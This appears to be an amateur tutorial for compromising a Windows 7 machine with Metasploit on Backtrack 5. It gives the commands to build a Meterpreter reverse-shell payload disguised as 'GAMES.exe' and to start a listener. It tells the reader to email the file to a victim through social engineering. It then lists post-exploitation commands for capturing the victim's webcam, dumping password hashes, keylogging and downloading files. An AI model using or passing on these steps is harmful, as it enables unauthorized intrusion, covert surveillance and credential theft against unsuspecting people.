Windows 7 Vurnerablity Exploited using Metasploit In BACKTRACK

· Windows 7 Vurnerablity Exploited using Metasploit In BACKTRACK

· Boot Backtrack 5 on machine.

· Open command shell.i.e KONSOLE

· Type msfconsole //OPEN MSFCONSOLE

msfpayload windows/meterpreter/reverse_tcp set LHOST=192.168.1.4 set LPORT=4444 x> /root/GAMES.exe

· //COMMAND 4 is the payload for the vurneablity.

· //LHOSTà Set local host

· //LPORTèSetlocal port

· //CREATE EXE FILE IN ROOT OF BT(X àexecutable)

· CHECK FOR THE FILE IN THE ROOT OF BT THE FILE WILL BE A EXE FILE **********************************************************************************

· THE ABOVE PROCEDURE IS FOR CREATING AN EXE FILE WHICH INCLUDES PAYLOAD FOR EXPLOIT.

· Use exploit/multi/handler //OPEN MULTIHANDLER

· Set PAYLOAD windows/meterpreter/reverse_tcp // SET PAYLOAD

· Set LHOST 192.168.1.4 //SET LOCAL HOST IP

· Set LPORT 4444 //SET LOCAL HOST PORT

· exploit //APPLY THE EXPLOIT AND START THE SERVER

· MEANWHILE BY THE MEANS OF SOCIAL ENGG. EMAIL THE GAMES.EXEFILE TO VICTIM N MAKE HIM EXECUTE THE FILE.

· THE BEST WAY IS TO BIND THE FILE AND SEND IT.

· Once the file is executed by the victim u will get notified of the connection getting established with your computer.

· Now you have the command console of the WIN7 machine on ur BT.

· ps //GIVES YOU THE PROCESSS LIST RUNNING ON VICTIMS PC

· 2212 EXPLORER.EXE //EXAMPLE OF PROCESS RUNNING

· Migrate 2212 //ATTAINS THE CONTROLOF THE PROCESS 2212(i.e. EXPLORER.exe)

· webcam //STARTS THE WEBCAM ON OTHER COMP

· webcam_snap //TAKES THE SNAP USING WEBCAM

· hashdump //GET THE HASH VALUES OF THE USER PASSWORD

· Keyscan_start //STARTS THE KEYLOGGER

· keyscan_dump //DISPLAYS THE RECORDED KEYSTROKES

· sysinfo //GIVES YOU SYSTEM INFO.

· getpid //GIVES THE ID OF COMPUTER

· download “filename” //DOWNLOAD A PARTICULAR FILE FROM THE VICTIMS MACHINE